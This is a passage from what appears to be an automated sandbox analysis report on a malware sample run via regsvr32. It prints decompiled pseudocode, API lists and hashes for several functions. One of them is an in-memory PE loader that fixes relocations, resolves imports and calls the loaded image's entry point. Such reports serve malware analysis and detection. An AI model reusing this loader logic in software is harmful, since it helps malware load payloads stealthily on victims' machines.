              • Opcode Fuzzy Hash: 68f404b2e0acd0d13bab8e04fc099641bfb2ee3f1317ac5396b3492ca0291229
              • Instruction Fuzzy Hash: 17A14D75D00219EFEB10DFA4D848AAEB7B8FF49310F24816AF505E7251DB789E40CB65
              Uniqueness

              Uniqueness Score: -1.00%

              Function 007414C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: _snprintfqsort
              • String ID: %I64d$false$null$true
              • API String ID: 756996078-4285102228
              • Opcode ID: ac8f1e81168a333e73565d15fef3361f3a8e215609cbb4e0b045559ca061f6a5
              • Instruction ID: d15c60f4ce308df5b71b9b5deacbe5c42cc7f689bafb473b6a022f3bf51c1677
              • Opcode Fuzzy Hash: ac8f1e81168a333e73565d15fef3361f3a8e215609cbb4e0b045559ca061f6a5
              • Instruction Fuzzy Hash: CBE1ABB1A0020AFBDF11AF64CC46EEF7B69EF55344F908025FD15DA141E779DAA08BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00743DC7 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 322libraryloaderstringCOMMON
              Download Yara Rule
              C-Code - Quality: 20%
              			E00743DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_t27 =  &_v28; // 0x743978
					_v56 = _v56 -  *_t27;
					_t29 =  &_v28; // 0x743978
					_v28 =  *_t29 - 8;
					_t31 =  &_v28; // 0x743978
					_v28 =  *_t31 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_t38 =  &_v28; // 0x743978
					_v60 =  *_t38;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































              0x00743dd0
              0x00743ddd
              0x00743de3
              0x00743dec
              0x00743def
              0x00743df2
              0x00000000
              0x00743ee3
              0x00743ee7
              0x00743ee9
              0x00743ef7
              0x00744015
              0x00744019
              0x007440de
              0x007440e7
              0x007440ea
              0x007440ee
              0x007440f4
              0x007440fc
              0x007440fc
              0x00744104
              0x00744112
              0x00744115
              0x00744119
              0x0074411f
              0x0074412f
              0x0074415a
              0x00000000
              0x0074415c
              0x00744135
              0x00744146
              0x00000000
              0x00744154
              0x00744158
              0x00000000
              0x00744154
              0x00744148
              0x0074414c
              0x00744151
              0x00000000
              0x00744151
              0x00744137
              0x0074413b
              0x0074413d
              0x00000000
              0x0074413d
              0x00744121
              0x00744125
              0x00000000
              0x00744127
              0x0074401f
              0x00744023
              0x00744025
              0x00744033
              0x00000000
              0x00000000
              0x00744039
              0x00744042
              0x00744050
              0x0074405c
              0x00744068
              0x00744071
              0x00744074
              0x00744078
              0x0074407a
              0x00744087
              0x0074409b
              0x007440aa
              0x007440bb
              0x00744084
              0x00000000
              0x00744084
              0x007440bd
              0x007440c1
              0x007440c6
              0x00000000
              0x007440c6
              0x007440d1
              0x00000000
              0x00000000
              0x007440d3
              0x007440d7
              0x00000000
              0x007440d9
              0x00743efd
              0x00743f06
              0x00743f14
              0x00743f17
              0x00743f34
              0x00743f3b
              0x00743f4d
              0x00743f4d
              0x00743f54
              0x00743f64
              0x00743f7c
              0x00743f66
              0x00743f6e
              0x00743f6e
              0x00743f7f
              0x00743f83
              0x00743f93
              0x00743fb6
              0x00743fc8
              0x00743f95
              0x00743fa9
              0x00743fa9
              0x00743fd2
              0x00743fee
              0x00743fd4
              0x00743fe3
              0x00743fe3
              0x00743ff6
              0x00743fff
              0x00743fff
              0x0074400d
              0x00000000
              0x00743f56
              0x00743f58
              0x00000000
              0x00743f58
              0x00743f54
              0x00000000
              0x00743f17
              0x00743dfa
              0x00743e08
              0x00743e0d
              0x00743e18
              0x00743e1b
              0x00743e1f
              0x00743e21
              0x00743e31
              0x00743e37
              0x00743e3a
              0x00743e3d
              0x00743e43
              0x00743e46
              0x00743e4b
              0x00743e54
              0x00743e5f
              0x00743e62
              0x00743e65
              0x00743e68
              0x00743e6b
              0x00743e72
              0x00743e79
              0x00000000
              0x00000000
              0x00743e84
              0x00743e92
              0x00743e9d
              0x00743ea7
              0x00743ebf
              0x00743ecc
              0x00743ecc
              0x00743ea9
              0x00743eb4
              0x00743eb4
              0x00743ed3
              0x00743ed3
              0x00743edb
              0x00743edb
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(00000000), ref: 00743F2E
              • LoadLibraryA.KERNEL32(00000000), ref: 00743F47
              • GetProcAddress.KERNEL32(00000000,?), ref: 00743FA3
              • GetProcAddress.KERNEL32(00000000,?), ref: 00743FC2
              • lstrcmpA.KERNEL32(?,00000000), ref: 007440B3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
              • String ID: x9t
              • API String ID: 1872726118-4233091173
              • Opcode ID: 9e4a30532ff9a7f95d8c8149a802bc7410c5e771dde3ef02573939e5856bbb61
              • Instruction ID: ddc0835a5bac2310315a17f322e46579acb89834ed1c5fe451bcb69f94beb8a4
              • Opcode Fuzzy Hash: 9e4a30532ff9a7f95d8c8149a802bc7410c5e771dde3ef02573939e5856bbb61
              • Instruction Fuzzy Hash: 48E1AF74E00219DFDB14CFA8C880BADBBF1BF08314F24855AE915AB361D738AA95DF54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073503F Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E0073503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x74f8d4; // 0xc2fc00
					_t3 = _t94 + 0x110; // 0xc316d0
					_t96 =  *0x74f8d8; // 0xc2fab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
				}
				if(E0073CB85(_t156) != 0) {
					L4:
					_t47 = E0073C85A();
					_push(_t99);
					_v588 = _t47;
					E0073C64D(_t47,  &_v580, _t173, _t175);
					_t100 = E00734FFB( &_v580,  &_v580, _t173);
					_t112 = E0073E34A( &_v580, E0073A5D0( &_v580), 0);
					E0073C870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E00733174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x74c9d8);
						_t55 = E00739C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E00739AB3(_v596);
							_t116 = _t101;
							 *0x74f990 = _t56;
							E0074F988 = E00739AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E0073A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x74ca26);
							_t146 = 0xe;
							E0073AC36(_t146, _t175);
							E0073AC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E0073AC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E0073B1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E0073B1B1(_t149, _t175);
							}
							_t65 = E0073A1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E0073ABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x74f8d4; // 0xc2fc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E00740DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x74f8d4; // 0xc2fc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E0073F15B(_t152);
									}
									E0073565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x74f8d4; // 0xc2fc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E0073109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E00738D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0xc2fe28
								_t127 = _t32;
								L20:
								_t67 = E007358D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x74f8d4; // 0xc2fc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E0073D210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x74f8d0; // 0xc2f8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x74f8d0; // 0xc2f8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E00738DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E00738DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E0073308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































              0x0073503f
              0x0073504c
              0x00735057
              0x0073505c
              0x0073505e
              0x00735061
              0x00735066
              0x00735069
              0x00735073
              0x00735075
              0x0073507a
              0x00735082
              0x0073508b
              0x0073508b
              0x00735098
              0x007350b3
              0x007350b5
              0x007350ba
              0x007350bf
              0x007350c5
              0x007350d4
              0x007350f3
              0x007350f5
              0x007350fa
              0x00735101
              0x00735106
              0x0073510d
              0x00735117
              0x00735119
              0x0073511a
              0x00735120
              0x00735125
              0x00735128
              0x0073512a
              0x0073512f
              0x00735196
              0x0073519b
              0x0073519d
              0x007351a7
              0x007351ac
              0x007351ac
              0x007351c6
              0x007351c8
              0x007351cb
              0x007351cd
              0x00000000
              0x00000000
              0x007351d3
              0x007351da
              0x007351dd
              0x007351e6
              0x007351eb
              0x007351f1
              0x007351f6
              0x007351fb
              0x007351ff
              0x00735201
              0x00735205
              0x00735205
              0x0073520a
              0x0073520d
              0x0073520f
              0x00735213
              0x00735213
              0x0073521a
              0x0073521f
              0x00735223
              0x00735226
              0x0073522b
              0x00735231
              0x00735232
              0x0073525a
              0x00735260
              0x00735267
              0x00735276
              0x0073527b
              0x00000000
              0x0073527b
              0x00735269
              0x00000000
              0x00735234
              0x00735234
              0x00735239
              0x00735240
              0x00735285
              0x00735285
              0x0073528c
              0x00735290
              0x00735291
              0x00735291
              0x0073529b
              0x007352a0
              0x007352a3
              0x007352a4
              0x007352a6
              0x007352a8
              0x007352ad
              0x007352b4
              0x007352f7
              0x007352b6
              0x007352bb
              0x007352c3
              0x007352c7
              0x007352d2
              0x007352dd
              0x007352e5
              0x007352e9
              0x007352f1
              0x007352f1
              0x007352b4
              0x007352fd
              0x00735300
              0x00735302
              0x00735308
              0x00735308
              0x0073530a
              0x0073530a
              0x00000000
              0x0073530a
              0x00735242
              0x00735242
              0x00735248
              0x0073524a
              0x0073524f
              0x0073524f
              0x00735251
              0x00735280
              0x00000000
              0x00735280
              0x00735253
              0x00735111
              0x00735111
              0x00000000
              0x00735111
              0x00735232
              0x00735135
              0x00735143
              0x00735156
              0x0073515b
              0x00735161
              0x00735163
              0x0073517b
              0x00735180
              0x00735189
              0x0073518f
              0x00000000
              0x0073518f
              0x0073516b
              0x00735174
              0x00000000
              0x00735174
              0x0073510f
              0x00000000
              0x0073509a
              0x007350a5
              0x007350ab
              0x007350ad
              0x0073530c
              0x0073530c
              0x0073530e
              0x00735314
              0x00735314
              0x00000000
              0x007350ad

              APIs
              • memset.MSVCRT ref: 00735061
              • lstrcpyW.KERNEL32 ref: 007352C7
              • lstrcatW.KERNEL32(00000000,?), ref: 007352E5
              • lstrcatW.KERNEL32(00000000,00000000), ref: 007352E9
              • lstrcatW.KERNEL32(00000000,0074CA28), ref: 007352F1
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$FreeHeaplstrcpymemset
              • String ID:
              • API String ID: 911671052-0
              • Opcode ID: c8823fe72357ff9649d04213804174a5bf20ff4974929a163a7763e9d560315f
              • Instruction ID: 21cfa8d5a6d3733e21fd77fbe5f733fd3878598a26947d0feca64208e2c6695f
              • Opcode Fuzzy Hash: c8823fe72357ff9649d04213804174a5bf20ff4974929a163a7763e9d560315f
              • Instruction Fuzzy Hash: DF710E72700305ABE314EB24DC4AB7B73EAAF85710F14452EF5569B293EB7C9D048B92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073DEAB Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E0073DEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x74c9d8);
						_t36 = E00739C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E00738DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















              0x0073deb4
              0x0073debb
              0x0073debe
              0x0073decb
              0x0073ded1
              0x0073ded4
              0x0073ded6
              0x0073dedb
              0x0073dfb3
              0x0073dfb3
              0x0073dfb3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073dee1
              0x0073dee1
              0x0073dee1
              0x0073dee4
              0x0073deea
              0x0073df06
              0x0073df0d
              0x0073df13
              0x0073df17
              0x0073df2b
              0x0073df2b
              0x0073df2e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073df19
              0x0073df19
              0x0073df1e
              0x0073df22
              0x0073df22
              0x0073df26
              0x0073df27
              0x00000000
              0x0073df19
              0x0073df2f
              0x0073df2f
              0x0073df32
              0x0073df33
              0x0073df3a
              0x0073df44
              0x00000000
              0x00000000
              0x0073df46
              0x0073df4c
              0x0073df50
              0x0073dfa9
              0x0073df59
              0x0073df66
              0x0073df6c
              0x0073df6e
              0x0073df75
              0x0073df7b
              0x0073df83
              0x0073df8b
              0x0073df97
              0x0073df9d
              0x00000000
              0x0073dfaf
              0x0073df3c
              0x00000000

              APIs
              • GetCommandLineW.KERNEL32 ref: 0073DEC0
              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0073DECB
              • lstrlenW.KERNEL32 ref: 0073DF0D
              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0073DF66
              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0073DF8B
              • lstrcpynW.KERNEL32(?,?,00000104), ref: 0073DFA9
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
              • String ID:
              • API String ID: 1259063344-0
              • Opcode ID: 95d9f4912328ea1c9984677be855ad250a9244e2e1469fea33de23ef6288cd60
              • Instruction ID: 693ed952d6f0ff00972eac3dae8140b7e987632882804154d77b2d7503db2025
              • Opcode Fuzzy Hash: 95d9f4912328ea1c9984677be855ad250a9244e2e1469fea33de23ef6288cd60
              • Instruction Fuzzy Hash: 7431B575D0011AEBEF349B55E8C8AAEB7B8EF45310F10415AE527E61A1EB789D808B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073E6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
              Download Yara Rule
              APIs
              • SysAllocString.OLEAUT32(00000000), ref: 0073E6ED
              • SysAllocString.OLEAUT32(?), ref: 0073E6F5
              • SysAllocString.OLEAUT32(00000000), ref: 0073E709
              • SysFreeString.OLEAUT32(?), ref: 0073E784
              • SysFreeString.OLEAUT32(?), ref: 0073E787
              • SysFreeString.OLEAUT32(?), ref: 0073E78C
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFree
              • String ID:
              • API String ID: 344208780-0
              • Opcode ID: e2270ed45a0984f2b871523a213c41425c1b73204eed3b8806fedaca0098373e
              • Instruction ID: 7450dbcb29d6c351f56a2a61c71905d3372d0793d5482f2e54d42fcaf3b4c109
              • Opcode Fuzzy Hash: e2270ed45a0984f2b871523a213c41425c1b73204eed3b8806fedaca0098373e
              • Instruction Fuzzy Hash: DF211975900219FFDB00DFA4CC88DAFBBBDEF88354B2044AAF505A7251DA75AE01CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00741A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: @$\u%04X$\u%04X\u%04X
              • API String ID: 0-2132903582
              • Opcode ID: e48fc4361ef91eaa1bbdec73084928d5391fa257f5fd87b46e6f61cef7b08dab
              • Instruction ID: e6d1dd71cba118fedb4a834e66c941a44964782c46e5240ee1eea40e12e657cf
              • Opcode Fuzzy Hash: e48fc4361ef91eaa1bbdec73084928d5391fa257f5fd87b46e6f61cef7b08dab
              • Instruction Fuzzy Hash: 1141E8B174020A97DF24BD6C8D9EABF3614DF41710F94412AFE16D6A40E36DCDD0D291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 007433DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E007433DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L00743533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E007433B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E00738ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x741bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













              0x007433da
              0x007433dd
              0x007433e2
              0x007433e6
              0x007433e6
              0x007433ec
              0x007433f0
              0x007433f1
              0x007433f4
              0x007433f5
              0x007433fa
              0x007433fd
              0x007433fe
              0x00743403
              0x0074340a
              0x00743493
              0x00743493
              0x00000000
              0x00743415
              0x00743416
              0x00743428
              0x0074344e
              0x0074344e
              0x00743457
              0x00743459
              0x0074345f
              0x0074348e
              0x0074348e
              0x00743496
              0x00743499
              0x00743499
              0x00743461
              0x00743462
              0x00743468
              0x0074346a
              0x0074346a
              0x0074346f
              0x0074346e
              0x0074346e
              0x00743476
              0x00743482
              0x0074348c
              0x0074348c
              0x00000000
              0x00743438
              0x00743438
              0x00743438
              0x0074343e
              0x00000000
              0x00000000
              0x00743440
              0x00743446
              0x0074344b
              0x00000000
              0x0074344b
              0x00743428

              APIs
              Strings
